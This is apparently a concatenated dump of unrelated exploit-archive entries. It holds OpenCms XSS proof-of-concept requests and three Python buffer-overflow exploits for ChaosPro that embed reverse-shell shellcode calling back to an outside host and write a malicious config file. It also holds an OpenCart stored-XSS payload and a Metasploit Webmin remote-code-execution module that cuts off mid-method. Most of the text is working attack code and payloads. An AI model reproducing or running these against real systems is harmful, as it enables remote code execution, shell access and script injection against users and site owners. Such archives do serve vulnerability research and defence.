8. In Account Management > Organizational Unit > Organizational Unit
Management > New sub organizational unit (Stored XSS):
- Affected resources parentOuDesc.0 and resources.0:
POC:```
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
```
9. In Link Validator > External Link Validator > Validate External Links
(Reflected XSS):
- Affected resources reporttype, reportcontinuekey and title:
POC:```
POST
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
HTTP/1.1
Host: example.com
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
```
10. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
downloadGallery.0:
POC:```
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"
.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"
/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"
[...]
```
11. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"
gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"
testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"
test
[...]
```


Extended POCs: https://aetsu.github.io/OpenCms

#!C:\Python27\python.exe

# Title     : ChaosPro 2.0
# Twitter   : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80         = "\x40\x75\x80\x75"
jmpforward06      = "\x40\x75\x06\x75"

# our egghunter shellcode
egghunter = ( 
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)

# our egg!
payload = "T00WT00W"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

#line containing our payload
line_start = "Username "
line_start += payload + "\n"

#line with our overflow
line_start += "ProjectPath "
junk = line_start

junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))

# our egghunter ... 
junk += egghunter

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ... 
junk += "\x50\x49\x40"

# write the evil file
with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)

#!C:\Python27\python.exe

# Title     : ChaosPro 2.1
# Twitter   : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# our egg!
payload = "T00WT00W"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

#this needs to be a backwards jump to give us room to call stack jump code
jmpbackD0         = "\x40\x75\xD0\x75"
jmpforward06      = "\x40\x75\x06\x75"

# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
opencalc          = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

# our egghunter shellcode
egghunter = ( 
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)

#line containing our payload
line_start = "Username "
line_start += payload + "\n"

#line with our overflow
line_start += "ProjectPath "
junk = line_start

junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))

junk += "A" * (118 - len(egghunter))

# open calc
junk += egghunter

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpbackD0

#seh address for pop, pop and ret with a 0x00 at the end ... 
junk += "\xab\x11\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)

#!C:\Python27\python.exe

# Title     : ChaosPro 3.1
# Twitter   : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# our egg!
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

#badchars
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

# stack alignment
pop_esp     = "\x5c"
pop_eax     = "\x58"
push_eax    = "\x50"
push_esp    = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax    = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80         = "\x40\x75\x80\x75"
jmpforward06      = "\x40\x75\x06\x75"

#line containing our payload
line_start = "Username "
line_start += payload + "\n"

#line with our overflow
line_start += "ProjectPath "
junk = line_start

#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522

#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# baby nopsled
junk += "A" * 9

# ok, lets start working stuff here ... we have 126 bytesish ... 
junk += zero_eax
junk += push_esp + pop_eax  # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp

# first section into the stack
# e7 ff e4 75
# good 
junk += zero_eax 
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax

# second section into the stack
# af e7 75 af
# good
junk += zero_eax 
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax

# third section into the stack
# d7 89 57 30
# good
junk += zero_eax 
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax

# size for section one
junk += "A" * (
  126
  - 9 # nopsled

  # aligning the stack
  - len(zero_eax) 
  - len(push_esp) 
  - len(pop_eax) 
  - len(align_stack) 
  - len(push_eax) 
  - len(pop_esp) 

    # first set of bytes going onto the stack
  - len(zero_eax)
  - 15 
  - len(push_eax)

    # second set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)

    # third set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)      
)

# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#Section Two

# baby nopsled
junk += "AAA"

# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax 
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax

# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax 
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax

# sixth section into the stack
# 2e cd 58 53
# good 
junk += zero_eax 
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax

# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax 
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax

junk += "A" * (
  126 # amount of room before we need to jump

  - 3 # baby nopsled

   # part one of fourth set of bytes going onto the stack
  - len(zero_eax)    

  # part two of fourth sec of bytes going onto the stack
  - 15
  - len(push_eax)

    # fifth set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)

    # sixth set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)

    # seventh set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)  

  - 4 # baby nopsled    
  - len(jmpback80)
)

# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

# baby nopsled
junk += "AAAA"

# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax 
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax

# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax 
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax

junk += "A" * (
  126 # amount of room before we need to jump

  - len(jmpback80)

  - 4 # baby nopsled

  # eighth set of bytes going onto the stack
  # eighth section
  - len(zero_eax)
  - 15
  - len(push_eax)  

  # ninth set of bytes going onto the stack
  - len(zero_eax)
  - 15
  - len(push_eax)

  - len(jmpforward06)
)

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ... 
junk += "\x5d\x10\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)

# Exploit Title: Opencart 3.x.x Authenticated Stored XSS
# Date: 08/15/2019
# Exploit Author: Nipun Somani
# Author Web: http://thehackerstore.net
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart
# Version: 3.x.x
# Tested on: Debian 9, Windows 10 x64
# CVE : CVE-2019-15081


Description:
The Opencart Version 3.x.x allows editing Source/HTML of the Categories /
Product / Information pages in the admin panel which isn't sanitized to
user input allowing for an attacker to execute arbitrary javascript code
leading to Stored Cross-Site-Scripting(XSS).

Proof-of-Concept(POC):

1. Log-in to admin-panel.
2. Navigate to Catlog and then select any of [Categories or Products or Information] options and and pick any entry or create one.
3. Under description click on Source option and insert your XSS payload.
i.e: "><script>alert("XSS")</script>
4. Now visit the modified page of your public website. And your injected XSS payload will execute.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
'Name'           => "Webmin < 1.930 Remote Code Execution",
'Description'    => %q{
      This exploit takes advantage of a code execution issue within the function 
      unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
      The only prerequisite is a valid session id.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'James Bercegay', # Vulnerability Discovery
        ],
'References'     =>
        [
          [ 'URL', 'https://www.gulftech.org/' ]
        ],
'Privileged'     => false,
'Payload'        =>
        {
'DisableNops' => true
        },
'Platform'       => ['unix'],
'Arch'           => ARCH_CMD,
'Targets'        => [ ['Automatic', {}] ],
'DisclosureDate' => '2019/08/30',
'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('WMPORT',   [ true,  "Webmin port",     '10000']),
        OptString.new('WMUSER',   [ true,  "Webmin username", 'test']),
        OptString.new('WMPASS',   [ true,  "Webmin password", 'test']),
      ])
  end

  def check

    # Set Webmin port
    datastore['RPORT'] = datastore['WMPORT']

    # Verbose
    print_status("Attempting to login")

    # Send login request
    res = send_request_cgi(
      {
'uri'       =>  '/session_login.cgi',
'method'    => 'POST',
'vars_post' =>
          {
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
          },
'cookie' => "redirect=1; testing=1; sessiontest=1;"
      })

    # If succesful cookie will be set
    if ( res and res.headers['Set-Cookie'] )
      # Do we have a valid SID?
      if ( /sid=/.match(res.headers['Set-Cookie']) )
        # Extract the SID
        sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
        print_good("Login was successful")
      else
        # No dice
        print_bad("Unable to login")
        return Exploit::CheckCode::Safe
      end
    else
        # No dice
        print_bad("Unexpected response")
        return Exploit::CheckCode::Safe
